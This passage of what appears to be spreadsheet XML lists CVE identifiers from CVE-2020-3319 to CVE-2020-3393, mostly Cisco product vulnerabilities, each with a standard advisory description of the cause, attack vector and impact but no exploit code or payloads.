    <t>CVE-2020-3319</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Network Recording Player and Cisco Webex Player for Microsoft Windows could allow an attacker to cause a process crash resulting in a Denial of service (DoS) condition for the player application on an affected system. The vulnerability exists due to insufficient validation of certain elements with a Webex recording stored in either the Advanced Recording Format (ARF) or the Webex Recording Format (WRF). An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to cause the Webex player application to crash when trying to view the malicious file. This vulnerability affects Cisco Webex Network Recording Player and Webex Player releases earlier than Release 3.0 MR3 Security Patch 2 and 4.0 MR3.</t>
  </si>
  <si>
    <t>CVE-2020-3320</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Firepower Management Center could allow an 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first entering input within the web-based management interface and then persuading a user of the interface to view the crafted input within the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3321</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Network Recording Player and Cisco Webex Player for Microsoft Windows could allow an attacker to cause a process crash resulting in a Denial of service (DoS) condition for the player application on an affected system. The vulnerability exists due to insufficient validation of certain elements with a Webex recording stored in either the Advanced Recording Format (ARF) or the Webex Recording Format (WRF). An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to cause the Webex player application to crash when trying to view the malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-3322</t>
  </si>
  <si>
    <t>CVE-2020-3323</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3327</t>
  </si>
  <si>
    <t>A vulnerability in the ARJ archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a heap buffer overflow read. An attacker could exploit this vulnerability by sending a crafted ARJ file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3329</t>
  </si>
  <si>
    <t>A vulnerability in role-based access control of Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow a read-only authenticated, remote attacker to disable user accounts on an affected system. The vulnerability is due to incorrect allocation of the enable/disable action button under the role-based access control code on an affected system. An attacker could exploit this vulnerability by authenticating as a read-only user and then updating the roles of other users to disable them. A successful exploit could allow the attacker to disable users, including administrative users.</t>
  </si>
  <si>
    <t>CVE-2020-3330</t>
  </si>
  <si>
    <t>A vulnerability in the Telnet service of Cisco Small Business RV110W Wireless-N VPN Firewall Routers could allow an unauthenticated, remote attacker to take full control of the device with a high-privileged account. The vulnerability exists because a system account has a default and static password. An attacker could exploit this vulnerability by using this default account to connect to the affected system. A successful exploit could allow the attacker to gain full control of an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3331</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco RV110W Wireless-N VPN Firewall and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input data by the web-based management interface. An attacker could exploit this vulnerability by sending crafted requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user.</t>
  </si>
  <si>
    <t>CVE-2020-3332</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker to inject arbitrary shell commands that are executed by an affected device. The vulnerability is due to insufficient input validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary shell commands or scripts with root privileges on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3333</t>
  </si>
  <si>
    <t>A vulnerability in the API of Cisco Application Services Engine Software could allow an unauthenticated, remote attacker to update event policies on an affected device. The vulnerability is due to insufficient authentication of users who modify policies on an affected device. An attacker could exploit this vulnerability by crafting a malicious HTTP request to contact an affected device. A successful exploit could allow the attacker to update event policies on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3334</t>
  </si>
  <si>
    <t>A vulnerability in the ARP packet processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series Security Appliances could allow an unauthenticated, adjacent attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of ARP packets received by the management interface of an affected device. An attacker could exploit this vulnerability by sending a series of unicast ARP packets in a short timeframe that would reach the management interface of an affected device. A successful exploit could allow the attacker to consume resources on an affected device, which would prevent the device from sending internal system keepalives and eventually cause the device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3335</t>
  </si>
  <si>
    <t>A vulnerability in the key store of Cisco Application Services Engine Software could allow an authenticated, local attacker to read sensitive information of other users on an affected device. The vulnerability is due to insufficient authorization limitations. An attacker could exploit this vulnerability by logging in to an affected device locally with valid credentials. A successful exploit could allow the attacker to read the sensitive information of other users on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3336</t>
  </si>
  <si>
    <t>A vulnerability in the software upgrade process of Cisco TelePresence Collaboration Endpoint Software and Cisco RoomOS Software could allow an authenticated, remote attacker to modify the filesystem to cause a denial of service (DoS) or gain privileged access to the root filesystem. The vulnerability is due to insufficient input validation. An attacker with administrative privileges could exploit this vulnerability by sending requests with malformed parameters to the system using the console, Secure Shell (SSH), or web API. A successful exploit could allow the attacker to modify the device configuration or cause a DoS.</t>
  </si>
  <si>
    <t>CVE-2020-3337</t>
  </si>
  <si>
    <t>A vulnerability in the web server of Cisco Umbrella could allow an unauthenticated, remote attacker to redirect a user to an undesired web page. The vulnerability is due to improper input validation of the URL parameters in an HTTP request that is sent to an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request that could cause the web application to redirect the request to a specified malicious URL. A successful exploit could allow the attacker to redirect a user to a malicious website.</t>
  </si>
  <si>
    <t>CVE-2020-3338</t>
  </si>
  <si>
    <t>A vulnerability in the Protocol Independent Multicast (PIM) feature for IPv6 networks (PIM6) of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper error handling when processing inbound PIM6 packets. An attacker could exploit this vulnerability by sending multiple crafted PIM6 packets to an affected device. A successful exploit could allow the attacker to cause the PIM6 application to leak system memory. Over time, this memory leak could cause the PIM6 application to stop processing legitimate PIM6 traffic, leading to a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3339</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Prime Infrastructure could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain and modify sensitive information that is stored in the underlying database.</t>
  </si>
  <si>
    <t>CVE-2020-3340</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit these vulnerabilities by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need valid administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2020-3341</t>
  </si>
  <si>
    <t>A vulnerability in the PDF archive parsing module in Clam AntiVirus (ClamAV) Software versions 0.101 - 0.102.2 could allow an unauthenticated, remote attacker to cause a denial of service condition on an affected device. The vulnerability is due to a stack buffer overflow read. An attacker could exploit this vulnerability by sending a crafted PDF file to an affected device. An exploit could allow the attacker to cause the ClamAV scanning process crash, resulting in a denial of service condition.</t>
  </si>
  <si>
    <t>CVE-2020-3342</t>
  </si>
  <si>
    <t>A vulnerability in the software update feature of Cisco Webex Meetings Desktop App for Mac could allow an unauthenticated, remote attacker to execute arbitrary code on an affected system. The vulnerability is due to improper validation of cryptographic protections on files that are downloaded by the application as part of a software update. An attacker could exploit this vulnerability by persuading a user to go to a website that returns files to the client that are similar to files that are returned from a valid Webex website. The client may fail to properly validate the cryptographic protections of the provided files before executing them as part of an update. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the user.</t>
  </si>
  <si>
    <t>CVE-2020-3343</t>
  </si>
  <si>
    <t>A vulnerability in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted packet to an affected device. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash and restart.</t>
  </si>
  <si>
    <t>CVE-2020-3344</t>
  </si>
  <si>
    <t>CVE-2020-3345</t>
  </si>
  <si>
    <t>A vulnerability in certain web pages of Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to modify a web page in the context of a browser. The vulnerability is due to improper checks on parameter values within affected pages. An attacker could exploit this vulnerability by persuading a user to follow a crafted link that is designed to pass HTML code into an affected parameter. A successful exploit could allow the attacker to alter the contents of a web page to redirect the user to potentially malicious web sites, or the attacker could leverage this vulnerability to conduct further client-side attacks.</t>
  </si>
  <si>
    <t>CVE-2020-3346</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web UI does not properly validate user-supplied input.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20-3347</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings Desktop App for Windows could allow an authenticated, local attacker to gain access to sensitive information on an affected system. The vulnerability is due to unsafe usage of shared memory that is used by the affected software. An attacker with permissions to view system memory could exploit this vulnerability by running an application on the local system that is designed to read shared memory. A successful exploit could allow the attacker to retrieve sensitive information from the shared memory, including usernames, meeting information, or authentication tokens that could aid the attacker in future attacks.</t>
  </si>
  <si>
    <t>CVE-2020-3348</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a customized link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3349</t>
  </si>
  <si>
    <t>CVE-2020-3350</t>
  </si>
  <si>
    <t>A vulnerability in the endpoint software of Cisco AMP for Endpoints and Clam AntiVirus could allow an authenticated, local attacker to cause the running software to delete arbitrary files on the system. The vulnerability is due to a race condition that could occur when scanning malicious files. An attacker with local shell access could exploit this vulnerability by executing a script that could trigger the race condition. A successful exploit could allow the attacker to delete arbitrary files on the system that the attacker would not normally have privileges to delete, producing system instability or causing the endpoint software to stop working.</t>
  </si>
  <si>
    <t>CVE-2020-3351</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper validation of fields in Cisco SD-WAN peering messages that are encapsulated in UDP packets. An attacker could exploit this vulnerability by sending crafted UDP messages to the targeted system. A successful exploit could allow the attacker to cause services on the device to fail, resulting in a DoS condition that could impact the targeted device and other devices that depend on it.</t>
  </si>
  <si>
    <t>CVE-2020-3352</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to access hidden commands. The vulnerability is due to the presence of undocumented configuration commands. An attacker could exploit this vulnerability by performing specific steps that make the hidden commands accessible. A successful exploit could allow the attacker to make configuration changes to various sections of an affected device that should not be exposed to CLI access.</t>
  </si>
  <si>
    <t>CVE-2020-3353</t>
  </si>
  <si>
    <t>A vulnerability in the syslog processing engine of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a race condition that may occur when syslog messages are processed. An attacker could exploit this vulnerability by sending a high rate of syslog messages to an affected device. A successful exploit could allow the attacker to cause the Application Server process to crash, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3354</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need administrative credentials on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3355</t>
  </si>
  <si>
    <t>CVE-2020-3356</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by interacting with the interface in a way that injects malicious content in a log file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3357</t>
  </si>
  <si>
    <t>A vulnerability in the Secure Sockets Layer (SSL) VPN feature of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device or cause the device to reload, resulting in a denial of service (DoS) condition. The vulnerability exists because HTTP requests are not properly validated. An attacker could exploit this vulnerability by sending a crafted HTTP request over an SSL connection to an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device or cause the device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3358</t>
  </si>
  <si>
    <t>A vulnerability in the Secure Sockets Layer (SSL) VPN feature for Cisco Small Business RV VPN Routers could allow an unauthenticated, remote attacker to cause the device to unexpectedly restart, causing a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request over an SSL connection to the targeted device. A successful exploit could allow the attacker to cause a reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3359</t>
  </si>
  <si>
    <t>A vulnerability in the multicast DNS (mDNS) feature of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper validation of mDNS packets. An attacker could exploit this vulnerability by sending a crafted mDNS packet to an affected device. A successful exploit could cause a device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3360</t>
  </si>
  <si>
    <t>A vulnerability in the Web Access feature of Cisco IP Phones Series 7800 and Series 8800 could allow an unauthenticated, remote attacker to view sensitive information on an affected device. The vulnerability is due to improper access controls on the web-based management interface of an affected device. An attacker could exploit this vulnerability by sending malicious requests to the device, which could allow the attacker to bypass access restrictions. A successful attack could allow the attacker to view sensitive information, including device call logs that contain names, usernames, and phone numbers of users of the device.</t>
  </si>
  <si>
    <t>CVE-2020-3361</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to gain unauthorized access to a vulnerable Webex site. The vulnerability is due to improper handling of authentication tokens by a vulnerable Webex site. An attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site. If successful, the attacker could gain the privileges of another user within the affected Webex site.</t>
  </si>
  <si>
    <t>CVE-2020-3362</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Network Services Orchestrator (NSO) could allow an authenticated, local attacker to access confidential information on an affected device. The vulnerability is due to a timing issue in the processing of CLI commands. An attacker could exploit this vulnerability by executing a specific sequence of commands on the CLI. A successful exploit could allow the attacker to read configuration information that would normally be accessible to administrators only.</t>
  </si>
  <si>
    <t>CVE-2020-3363</t>
  </si>
  <si>
    <t>A vulnerability in the IPv6 packet processing engine of Cisco Small Business Smart and Managed Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient validation of incoming IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet through an affected device. A successful exploit could allow the attacker to cause an unexpected reboot of the switch, leading to a DoS condition. This vulnerability is specific to IPv6 traffic. IPv4 traffic is not affected.</t>
  </si>
  <si>
    <t>CVE-2020-3364</t>
  </si>
  <si>
    <t>A vulnerability in the access control list (ACL) functionality of the standby route processor management interface of Cisco IOS XR Software could allow an unauthenticated, remote attacker to reach the configured IP addresses on the standby route processor management Gigabit Ethernet Management interface. The vulnerability is due to a logic error that was introduced in the Cisco IOS XR Software, which prevents the ACL from working when applied against the standby route processor management interface. An attacker could exploit this vulnerability by attempting to access the device through the standby route processor management interface.</t>
  </si>
  <si>
    <t>CVE-2020-3365</t>
  </si>
  <si>
    <t>A vulnerability in the directory permissions of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to perform a directory traversal attack on a limited set of restricted directories. The vulnerability is due to a flaw in the logic that governs directory permissions. An attacker could exploit this vulnerability by using capabilities that are not controlled by the role-based access control (RBAC) mechanisms of the software. A successful exploit could allow the attacker to overwrite files on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3367</t>
  </si>
  <si>
    <t>A vulnerability in the log subscription subsystem of Cisco AsyncOS for the Cisco Secure Web Appliance (formerly Web Security Appliance) could allow an authenticated, local attacker to perform command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface and CLI. An attacker could exploit this vulnerability by authenticating to the affected device and injecting scripting commands in the scope of the log subscription subsystem. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root.</t>
  </si>
  <si>
    <t>CVE-2020-3368</t>
  </si>
  <si>
    <t>CVE-2020-3369</t>
  </si>
  <si>
    <t>A vulnerability in the deep packet inspection (DPI) engine of Cisco SD-WAN vEdge Routers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper processing of FTP traffic. An attacker could exploit this vulnerability by sending crafted FTP packets through an affected device. A successful exploit could allow the attacker to make the device reboot continuously, causing a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3370</t>
  </si>
  <si>
    <t>A vulnerability in URL filtering of Cisco Content Security Management Appliance (SMA) could allow an unauthenticated, remote attacker to bypass URL filtering on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted, malicious HTTP request to an affected device. A successful exploit could allow the attacker to redirect users to malicious sites.</t>
  </si>
  <si>
    <t>CVE-2020-3371</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker to inject arbitrary code and execute arbitrary commands at the underlying operating system level. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to inject and execute arbitrary commands at the underlying operating system level.</t>
  </si>
  <si>
    <t>CVE-2020-3372</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to consume excessive system memory and cause a denial of service (DoS) condition on an affected system. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a large number of crafted HTTP requests to the affected web-based management interface. A successful exploit could allow the attacker to exhaust system memory, which could cause the system to stop processing new connections and could result in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3373</t>
  </si>
  <si>
    <t>A vulnerability in the IP fragment-handling implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak on an affected device. This memory leak could prevent traffic from being processed through the device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper error handling when specific failures occur during IP fragment reassembly. An attacker could exploit this vulnerability by sending crafted, fragmented IP traffic to a targeted device. A successful exploit could allow the attacker to continuously consume memory on the affected device and eventually impact traffic, resulting in a DoS condition. The device could require a manual reboot to recover from the DoS condition. Note: This vulnerability applies to both IP Version 4 (IPv4) and IP Version 6 (IPv6) traffic.</t>
  </si>
  <si>
    <t>CVE-2020-3374</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system. The vulnerability is due to insufficient authorization checking on the affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. The attacker may be able to access sensitive information, modify the system configuration, or impact the availability of the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3375</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain access to information that they are not authorized to access, make changes to the system that they are not authorized to make, and execute commands on an affected system with privileges of the root user.</t>
  </si>
  <si>
    <t>CVE-2020-3376</t>
  </si>
  <si>
    <t>A vulnerability in the Device Manager application of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions on an affected device. The vulnerability is due to a failure in the software to perform proper authentication. An attacker could exploit this vulnerability by browsing to one of the hosted URLs in Cisco DCNM. A successful exploit could allow the attacker to interact with and use certain functions within the Cisco DCNM.</t>
  </si>
  <si>
    <t>CVE-2020-3377</t>
  </si>
  <si>
    <t>A vulnerability in the Device Manager application of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to inject arbitrary commands on the affected device. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted arguments to a specific field within the application. A successful exploit could allow the attacker to run commands as the administrator on the DCNM.</t>
  </si>
  <si>
    <t>CVE-2020-3378</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface for Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to impact the integrity of an affected system by executing arbitrary SQL queries. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted input that includes SQL statements to an affected system. A successful exploit could allow the attacker to modify entries in some database tables, affecting the integrity of the data.</t>
  </si>
  <si>
    <t>CVE-2020-3379</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Solution Software could allow an authenticated, local attacker to elevate privileges to Administrator on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to an affected system. A successful exploit could allow the attacker to gain administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3380</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco Data Center Network Manager (DCNM) could allow an authenticated, local attacker to elevate privileges to root and execute arbitrary commands on the underlying operating system. The vulnerability is due to insufficient restrictions during the execution of an affected CLI command. An attacker could exploit this vulnerability by authenticating as the fmserver user and submitting malicious input to a specific command. A successful exploit could allow the attacker to elevate privileges to root and execute arbitrary commands on the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-3381</t>
  </si>
  <si>
    <t>A vulnerability in the web management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct directory traversal attacks and obtain read and write access to sensitive files on a targeted system. The vulnerability is due to a lack of proper validation of files that are uploaded to an affected device. An attacker could exploit this vulnerability by uploading a crafted file to an affected system. An exploit could allow the attacker to view or modify arbitrary files on the targeted system.</t>
  </si>
  <si>
    <t>CVE-2020-3382</t>
  </si>
  <si>
    <t>A vulnerability in the REST API of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability exists because different installations share a static encryption key. An attacker could exploit this vulnerability by using the static key to craft a valid session token. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3383</t>
  </si>
  <si>
    <t>A vulnerability in the archive utility of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to a lack of proper input validation of paths that are embedded within archive files. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to write arbitrary files in the system with the privileges of the logged-in user.</t>
  </si>
  <si>
    <t>CVE-2020-3384</t>
  </si>
  <si>
    <t>A vulnerability in specific REST API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system with the privileges of the logged-in user. The vulnerability is due to insufficient validation of user-supplied input to the API. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to inject arbitrary commands on the underlying operating system.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-3385</t>
  </si>
  <si>
    <t>A vulnerability in the deep packet inspection (DPI) engine of Cisco SD-WAN vEdge Routers could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected system. The vulnerability is due to insufficient handling of malformed packets. An attacker could exploit this vulnerability by sending crafted packets through an affected device. A successful exploit could allow the attacker to cause the device to reboot, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3386</t>
  </si>
  <si>
    <t>A vulnerability in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker with a low-privileged account to bypass authorization on the API of an affected device. The vulnerability is due to insufficient authorization of certain API functions. An attacker could exploit this vulnerability by sending a crafted request to the API using low-privileged credentials. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3387</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to execute code with root privileges on an affected system. The vulnerability is due to insufficient input sanitization during user authentication processing. An attacker could exploit this vulnerability by sending a crafted response to the Cisco SD-WAN vManage Software. A successful exploit could allow the attacker to access the software and execute commands they should not be authorized to execute.</t>
  </si>
  <si>
    <t>CVE-2020-3388</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting crafted input to the CLI. The attacker must be authenticated to access the CLI. A successful exploit could allow the attacker to execute commands with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3389</t>
  </si>
  <si>
    <t>A vulnerability in the installation component of Cisco Hyperflex HX-Series Software could allow an authenticated, local attacker to retrieve the password that was configured at installation on an affected device. The vulnerability exists because sensitive information is stored as clear text. An attacker could exploit this vulnerability by authenticating to an affected device and navigating to the directory that contains sensitive information. A successful exploit could allow the attacker to obtain sensitive information in clear text from the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3390</t>
  </si>
  <si>
    <t>A vulnerability in Simple Network Management Protocol (SNMP) trap generation for wireless clients of the Cisco IOS XE Wireless Controller Software for the Cisco Catalyst 9000 Family could allow an unauthenticated, adjacent attacker to cause the device to unexpectedly reload, causing a denial of service (DoS) condition on an affected device. The vulnerability is due to the lack of input validation of the information used to generate an SNMP trap in relation to a wireless client connection. An attacker could exploit this vulnerability by sending an 802.1x packet with crafted parameters during the wireless authentication setup phase of a connection. A successful exploit could allow the attacker to cause the device to reload, causing a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3391</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to view sensitive information in clear text. The vulnerability is due to insecure storage of certain unencrypted credentials on an affected device. An attacker could exploit this vulnerability by viewing the network device configuration and obtaining credentials that they may not normally have access to. A successful exploit could allow the attacker to use those credentials to discover and manage network devices.</t>
  </si>
  <si>
    <t>CVE-2020-3392</t>
  </si>
  <si>
    <t>A vulnerability in the API of Cisco IoT Field Network Director (FND) could allow an unauthenticated, remote attacker to view sensitive information on an affected system. The vulnerability exists because the affected software does not properly authenticate API calls. An attacker could exploit this vulnerability by sending API requests to an affected system. A successful exploit could allow the attacker to view sensitive information on the affected system, including information about the devices that the system manages, without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-3393</t>
  </si>
  <si>
    <t>A vulnerability in the application-hosting subsystem of Cisco IOS XE Software could allow an authenticated, local attacker to elevate privileges to root on an affected device. The attacker could execute IOS XE commands outside the application-hosting subsystem Docker container as well as on the underlying Linux operating system. These commands could be run as the root user. The vulnerability is due to a combination of two factors: (a) incomplete input validation of the user payload of CLI commands, and (b) improper role-based access control (RBAC) when commands are issued at the command line within the application-hosting subsystem. An attacker could exploit this vulnerability by using a CLI command with crafted user input. A successful exploit could allow the lower-privileged attacker to execute arbitrary CLI commands with root privileges. The attacker would need valid user credentials to exploit this vulnerability.</t>
  </si>
  <si>
